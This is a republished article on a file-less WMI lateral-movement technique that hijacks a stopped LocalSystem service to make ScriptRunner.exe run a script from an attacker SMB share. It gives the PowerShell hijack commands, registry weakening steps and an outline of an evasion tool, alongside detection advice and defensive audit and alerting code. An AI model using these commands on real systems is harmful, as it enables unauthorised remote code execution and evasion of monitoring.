Bypassing Traditional WMIExec Detection with a File‑less WMI Lateral Movement Technique

The article dissects a stealthy, file‑less WMI lateral movement method that avoids the obvious Win32_Process.Create signature: it hijacks the PathName of a stopped LocalSystem service, uses the LOLBIN ScriptRunner.exe to run a script straight from a remote SMB share, and then restores the service's original PathName so that few forensic traces remain.


Problem with traditional wmiexec.py

Uses Win32_Process.Create to spawn a process.

Command output is written to the ADMIN$ share, leaving clear disk artifacts.

Resulting logs and process chains are easily detected by EDR solutions.

Improved stealthy approach

Replace the PathName of a stopped service that runs as LocalSystem instead of invoking Win32_Process.

Leverage the LOLBIN ScriptRunner.exe to execute a .cmd script directly from a remote SMB share, satisfying a “no‑disk‑drop” requirement.

Redirect command output back to the attacker‑controlled SMB share, avoiding any local file writes.

Restore the original service PathName after execution to erase evidence.

Required configuration

Enable insecure guest authentication so that the LocalSystem account can access the attacker’s SMB share without credentials:

HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters\AllowInsecureGuestAuth = 1 (DWORD)

Add .cmd to the low‑risk file type whitelist to suppress security prompts when executing remote scripts:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Associations\LowRiskFileTypes = .cmd
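The two registry values above are the technique's preconditions, so a defender can audit for them before any attack happens. The following is an added example (not code from the article or the StealthyWMIExec project): it parses a constructed `reg export` dump of the two keys and reports where the observed values differ from the hardened state. Key paths and value names come from the article; the sample dump contents and the list of script extensions treated as risky are assumptions for illustration.

```python
"""Audit a .reg export for the two settings the service-hijack technique relies on.

Added example, not from the original article or the StealthyWMIExec project.
Input is a constructed `reg export` dump embedded below; on a real host the same
text comes from `reg export <key> <file>` for each key (exports are UTF-16 on disk).
"""
import re

GUEST_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters"
ASSOC_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations"

# Extensions that should never be whitelisted as "low risk" (assumed list).
SCRIPT_EXTS = {".cmd", ".bat", ".ps1", ".vbs", ".js"}

# Constructed sample of an exposed host: guest auth on, .cmd whitelisted.
EXPOSED_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters]
"AllowInsecureGuestAuth"=dword:00000001
"EnableSecuritySignature"=dword:00000001

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=".cmd;.bat"
'''

# Constructed sample of the hardened state: guest auth explicitly off, no whitelist.
HARDENED_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters]
"AllowInsecureGuestAuth"=dword:00000000
'''

_VALUE_RE = re.compile(r'"([^"]+)"=(?:dword:([0-9a-fA-F]{8})|"(.*)")$')


def parse_reg(text):
    """Parse the subset of .reg syntax used here: [key] headers plus
    "name"=dword:hex and "name"="string" lines. Returns {key: {name: value}}
    with dwords converted to int and .reg backslash escapes undone."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current and line.startswith('"'):
            m = _VALUE_RE.match(line)
            if not m:
                continue
            name, dword, string = m.groups()
            keys[current][name] = int(dword, 16) if dword is not None else string.replace("\\\\", "\\")
    return keys


def audit(reg):
    """Return findings as (value name, observed, expected) tuples.
    An absent AllowInsecureGuestAuth is treated as 0, the default on
    Windows 10 1709+ / Server 2019+; older builds allowed guest auth by
    default, so check the OS version separately there."""
    findings = []
    guest = reg.get(GUEST_KEY, {}).get("AllowInsecureGuestAuth", 0)
    if guest != 0:
        findings.append(("AllowInsecureGuestAuth", guest, 0))
    lowrisk = reg.get(ASSOC_KEY, {}).get("LowRiskFileTypes", "")
    risky = [ext for ext in lowrisk.lower().split(";") if ext in SCRIPT_EXTS]
    if risky:
        findings.append(("LowRiskFileTypes", lowrisk, ""))
    return findings


if __name__ == "__main__":
    for label, dump in (("exposed", EXPOSED_REG), ("hardened", HARDENED_REG)):
        print(label, audit(parse_reg(dump)))
```

Run against a fleet of exports, any host that reports a finding for either value is one on which the article's LocalSystem-to-attacker-share hop would work without further setup; the hardened export shows what the keys should contain.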

Service selection and modification

Query for a stopped service running as LocalSystem:

$TargetService = Get-CimInstance -ClassName Win32_Service -Filter "State='Stopped' AND StartName='LocalSystem'" | Select-Object -First 1

Overwrite the service PathName with a ScriptRunner command that loads the remote script:

Invoke-CimMethod -InputObject $TargetService -MethodName Change -Arguments @{ PathName = "C:\Windows\System32\scriptrunner.exe -appvscript \\192.168.122.126\share\shell.cmd" }

Start the service to trigger execution:

Invoke-CimMethod -InputObject $TargetService -MethodName StartService

Full automation – StealthyWMIExec.py

Start an SMB share on the attacker host to host the payload and receive results.

Remote‑check the target registry; if .cmd is not in LowRiskFileTypes, add it.

Perform the WMI query to locate a suitable stopped LocalSystem service.

Backup the original PathName and replace it with the ScriptRunner command pointing to the remote .cmd script.

Generate the .cmd payload that runs the desired command and writes output to the attacker SMB share.

Start the modified service; the command runs and the result is streamed back.

Automatically restore the original service PathName after execution.

Read and display the collected output (e.g., whoami, hostname).

Technical highlights

File‑less operation: the script is loaded remotely, no local disk artifacts.

No use of Win32_Process, bypassing traditional WMI detection signatures.

Execution under LocalSystem provides high‑privilege access to the SMB share without additional authentication.

Service PathName is automatically restored, leaving minimal forensic trace.

Relies on the built‑in Windows binary ScriptRunner.exe, which is less likely to be classified as malicious than a dropped tool.

Defensive and detection recommendations

Monitor abnormal launches of ScriptRunner.exe with the -appvscript argument and remote UNC paths.

Audit unexpected modifications to service PathName via WMI.

Disable unnecessary AllowInsecureGuestAuth settings.

Restrict direct execution of .cmd or .ps1 scripts from remote SMB shares.

Log and alert on WMI calls to Win32_Service.Change and StartService.

Enable registry monitoring for critical service configuration keys.
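The recommendations above reduce to a handful of rules over process-creation and registry-modification telemetry. The following is an added example (not code from the article or the StealthyWMIExec project) that applies those rules to a constructed stream of simplified Sysmon-style events (Event 1 process creation, Event 13 registry value set) and also pairs a suspicious service ImagePath rewrite with its later restore, since the cleanup step the technique depends on is itself a signal. Event field names follow Sysmon's conventions; the service name, host address and event contents are constructed. One assumption worth stating: because Win32_Service.Change is carried out by the Service Control Manager, the registry write shows services.exe as the writing process, so the rules key on the value contents rather than on which process wrote it.

```python
"""Detection rules for the service-PathName hijack / ScriptRunner pattern.

Added example, not code from the article or the StealthyWMIExec project.
Events are simplified Sysmon-style dicts constructed inline (Event 1 process
creation, Event 13 registry value set); field names follow Sysmon's.
"""
import re

UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\s]+")  # \\host\share\... anywhere in a string
SERVICE_IMAGEPATH_RE = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)
# Values the article's preconditions depend on (Sysmon-normalised HKLM paths).
SENSITIVE_VALUES = {
    r"hklm\system\currentcontrolset\services\lanmanworkstation\parameters\allowinsecureguestauth",
    r"hklm\software\microsoft\windows\currentversion\policies\associations\lowriskfiletypes",
}

# Constructed sample stream (192.0.2.10 is a documentation address, ExampleSvc a made-up service).
EVENTS = [
    # 0: SCM starts ScriptRunner.exe with a remote script: the hijacked service firing
    {"id": 1, "Image": r"C:\Windows\System32\ScriptRunner.exe",
     "CommandLine": r"C:\Windows\System32\scriptrunner.exe -appvscript \\192.0.2.10\share\shell.cmd",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    # 1: benign App-V use: local script, parent is the App-V client
    {"id": 1, "Image": r"C:\Windows\System32\ScriptRunner.exe",
     "CommandLine": r"ScriptRunner.exe -appvscript C:\ProgramData\App-V\setup.cmd",
     "ParentImage": r"C:\Program Files\Microsoft Application Virtualization\Client\AppVClient.exe"},
    # 2: service ImagePath rewritten to ScriptRunner plus a UNC path
    {"id": 13, "TargetObject": r"HKLM\System\CurrentControlSet\Services\ExampleSvc\ImagePath",
     "Details": r"C:\Windows\System32\scriptrunner.exe -appvscript \\192.0.2.10\share\shell.cmd"},
    # 3: the same value put back: the cleanup step
    {"id": 13, "TargetObject": r"HKLM\System\CurrentControlSet\Services\ExampleSvc\ImagePath",
     "Details": r"C:\Windows\System32\examplesvc.exe"},
    # 4: insecure guest auth switched on
    {"id": 13, "TargetObject": r"HKLM\System\CurrentControlSet\Services\LanmanWorkstation\Parameters\AllowInsecureGuestAuth",
     "Details": "DWORD (0x00000001)"},
]


def classify(ev):
    """Return (severity, reason) for a matching event, else None."""
    if ev["id"] == 1:
        if not ev["Image"].lower().endswith(r"\scriptrunner.exe"):
            return None
        cmd = ev.get("CommandLine", "")
        remote = "-appvscript" in cmd.lower() and bool(UNC_RE.search(cmd))
        from_scm = ev.get("ParentImage", "").lower().endswith(r"\services.exe")
        if remote and from_scm:
            return ("high", "ScriptRunner started by the SCM with a remote -appvscript target")
        if remote:
            return ("medium", "ScriptRunner executing -appvscript from a UNC path")
        if from_scm:
            return ("medium", "ScriptRunner running as a service binary")
        return None
    if ev["id"] == 13:
        target, details = ev["TargetObject"], ev.get("Details", "")
        m = SERVICE_IMAGEPATH_RE.match(target)
        if m:
            if "scriptrunner" in details.lower() or UNC_RE.search(details):
                return ("high", f"ImagePath of service {m.group(1)} set to ScriptRunner/UNC: {details}")
            return ("low", f"ImagePath of service {m.group(1)} changed: {details}")
        if target.lower() in SENSITIVE_VALUES:
            return ("medium", f"security-relevant value changed: {target} -> {details}")
    return None


def scan(events):
    """Apply classify() to a stream; returns [(index, severity, reason), ...]."""
    return [(i, *r) for i, ev in enumerate(events) if (r := classify(ev))]


def hijack_then_restore(events):
    """Services whose ImagePath was set to a suspicious value and later rewritten:
    returns [(service, suspicious value, restored value), ...]."""
    pending, found = {}, []
    for ev in events:
        if ev["id"] != 13:
            continue
        m = SERVICE_IMAGEPATH_RE.match(ev["TargetObject"])
        if not m:
            continue
        svc, details = m.group(1).lower(), ev.get("Details", "")
        if "scriptrunner" in details.lower() or UNC_RE.search(details):
            pending[svc] = details
        elif svc in pending:
            found.append((svc, pending.pop(svc), details))
    return found


if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(hit)
    print("hijack/restore pairs:", hijack_then_restore(EVENTS))
```

The benign App-V launch (event 1) produces no alert, while the restore (event 3) is only low severity on its own; it is the pairing with the earlier ScriptRunner/UNC value on the same service that turns the "restore the PathName" step into a high-confidence indicator.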

Source code and further details are available at https://github.com/Ghaleb0x317374/StealthyWMIExec.py

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Tags: Lateral Movement, WMI, Detection Evasion, Fileless Attack, LOLBIN, ScriptRunner
Written by Black & White Path